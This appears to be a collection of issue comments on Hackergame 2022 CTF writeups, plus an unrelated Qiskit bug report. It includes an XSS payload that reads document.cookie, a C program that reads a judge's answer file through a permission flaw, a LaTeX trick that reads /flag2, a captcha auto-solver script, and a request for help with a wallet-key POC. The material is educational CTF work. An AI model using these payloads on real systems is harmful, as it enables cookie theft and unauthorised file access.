出题人在打包 docker image 时把 data/ 目录用 COPY 加入了 image 中，并且设置目录拥有者为 judger，目录的权限是 766。

在 online_judge.py 中预期使用 os.makedir() 来设置 data 目录的权限为 700，但是 os.makedir() 不改变已存在的目录的权限，见 python 3.11 文档 os.makedirs。所以 runner 用户可以读取 data 中的内容。

而 static.out 是其他用户可读的。所以有下面的非预期解。

#include <stdio.h>
#include <stdlib.h>

// static_data_path
char *sdata_input_path = "./data/static.in";
char *sdata_output_path = "./data/static.out";

const int LEN = 2048;

int main() {
    char *lines[2];
    size_t ns[2];
    FILE *fp = fopen(sdata_output_path, "r");
    if (fp == NULL) {
        printf("failed to read static output");
        exit(1);
    }
    // read and show the 2 prime numbers.
    getline(&lines[0], &ns[0], fp);
    printf("%s", lines[0]);
    getline(&lines[1], &ns[0], fp);
    printf("%s", lines[1]);

    free(lines[0]);
    free(lines[1]);
    fclose(fp);
    return 0;
}

直接alert(document.cookie)selenium就把flag打出来了。

Please submit your quiz URL:
> http://202.38.93.111:10056/share?result=MDo8aW1nIHNyYz14IG9uZXJyb3I9ImFsZXJ0KGRvY3VtZW50LmNvb2tpZSkiPg==
Your URL converted to http://web/share?result=MDo8aW1nIHNyYz14IG9uZXJyb3I9ImFsZXJ0KGRvY3VtZW50LmNvb2tpZSkiPg==
 I am using Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/106.0.5249.119 Safari/537.36
- Logining...
 Putting secret flag...
- Now browsing your quiz result...
ERROR <class 'selenium.common.exceptions.UnexpectedAlertPresentException'>
selenium.common.exceptions.UnexpectedAlertPresentException: Alert Text: flag=flag{xS5_1OI_is_N0t_SOHARD_9692b1a93e}
Message: unexpected alert open: {Alert text : flag=flag{xS5_1OI_is_N0t_SOHARD_9692b1a93e}}
  (Session info: headless chrome=106.0.5249.119)
Stacktrace:
#0 0x55be02e75d53 <unknown>
#1 0x55be02c62786 <unknown>
#2 0x55be02cd6636 <unknown>

0xffffffffffffffffffffffffffffffff 是一个解，因为这玩意 crc128 出来就是它本身，并且这是一个 des 弱密钥...顺手一试就试出来了

macOS里写的exif版本是2.3.1，多了一个点……

到底哪个才是对的呢

Hi all, any body help me?
My question is how to use method
secp256k1_sqr_mont(BN_ULONG res[P256_LIMBS], const BN_ULONG a[P256_LIMBS])
from https://github.com/piggypiggy/secp256k1-x64

the poc code for https://github.com/USTC-Hackergame/hackergame2022-writeups/tree/master/official/%E5%B0%8F%20Z%20%E7%9A%84%E9%9D%93%E5%8F%B7%E9%92%B1%E5%8C%85

this POC only work for this public key
0x04a362925f16b3f45e7048b376dfd54beedee8defc8ea0804823c489f3cf5862f13e89da68fa280f0812ef2d339d95352bd97c03ccf0a6304a1aa004b6557ddd4b

i tried using other (profanity) public key not working, any idea?
i have CTF challange to solve using this POC pls

rclone有个command verb叫rclone reveal
开发者也没想到有人需要去爬Go源码解密这个
文档里也说了是防备 Eyedropping 的

Environment

• qiskit.version: 0.45.2
• Python version: 3.10.12
• Operating system: Ubuntu 20.04

What is happening?

In the Python file code.py the qc.measure_all() call creates a new classical register and does not use the one already provided during initialization via QuantumCircuit(129,128).

How can we reproduce the issue?

I demonstrate the issue at a smaller scale, becasue I cannot simulate such a large circuit, but the issue is even more important when the register allocated are bigger. Run the following code in the Python file:

from qiskit import QuantumCircuit, Aer

circuit = QuantumCircuit(5, 5)
circuit.x(0)
circuit.x(4)
circuit.measure_all()  # <-- this will create a new classical register

sim = Aer.get_backend('qasm_simulator')
counts = sim.run(circuit).result().get_counts()
print(counts)  # <-- you can see the output here

The output will be {'10001 00000': 1024}. There are double the number of bits in the output, because the classical register is not used.

What should happen?

I would have expected to use the classical register already provided during initialization.

Any suggestions?

What about using the add_bits=False flag in the measure_all method to reuse the existing classical register? Here is the suggested version:

qc.measure_all(add_bits=False)

Thanks in advance, I wish you a happy and productive day.

Try this:

$$
\begingroup
\catcode `\$=12
\catcode `\#=12
\catcode `\_=12
\catcode `\&=12
\input{/flag2}
\endgroup
$$

Really not worth making a PR for this...

ref: https://github.com/USTC-Hackergame/hackergame2022-writeups/blob/master/official/LaTeX%20%E6%9C%BA%E5%99%A8%E4%BA%BA/README.md

This is mentioned in a group chat

On the page http://202.38.93.111:18000/ , open console and call functions from the script will automatically gives correct flag:

And will trigger the page to reload and give these results:

The reason behind this is about how js handle undefined, in functionchange(value) we have:

function change(value) {
    range[1] = Math.round(parseFloat(value) * 1000000)
    document.getElementById('submit').disabled = !(range[1] >= 0 && range[1] <= 1000000)
}

Here, calling parseFloat(undefined) will return NaN instead of triggering an error:

And by accident(kind of?), Javascript and Java share the identical naming for NaN, the POST payload triggered is shown as:

Thus giving the correct flag.

应为 src/getflag.hei.py
不好意思单独为这个问题开 PR，所以提 issues 了

create a tampermonkey script and enable it.

// default settings...
// ...
// @match        http://202.38.93.111:10047/xcaptcha
// ...

(function() {
    'use strict';

    // Your code here...
    let btn = document.getElementById("submit")
    
    // calsulate the first one
    let nums = document.querySelector("body > div > form > div:nth-child(1) > label").innerHTML.split(" ")[0].split("+")
    let sum = (BigInt(nums[0])+BigInt(nums[1])).toString()
    document.querySelector("#captcha1").value=sum

    // second
    nums = document.querySelector("body > div > form > div:nth-child(2) > label").innerHTML.split(" ")[0].split("+")
    sum = (BigInt(nums[0])+BigInt(nums[1])).toString()
    document.querySelector("#captcha2").value=sum

    // third
    nums = document.querySelector("body > div > form > div:nth-child(3) > label").innerHTML.split(" ")[0].split("+")
    sum = (BigInt(nums[0])+BigInt(nums[1])).toString()
    document.querySelector("#captcha3").value=sum

    btn.click()

})();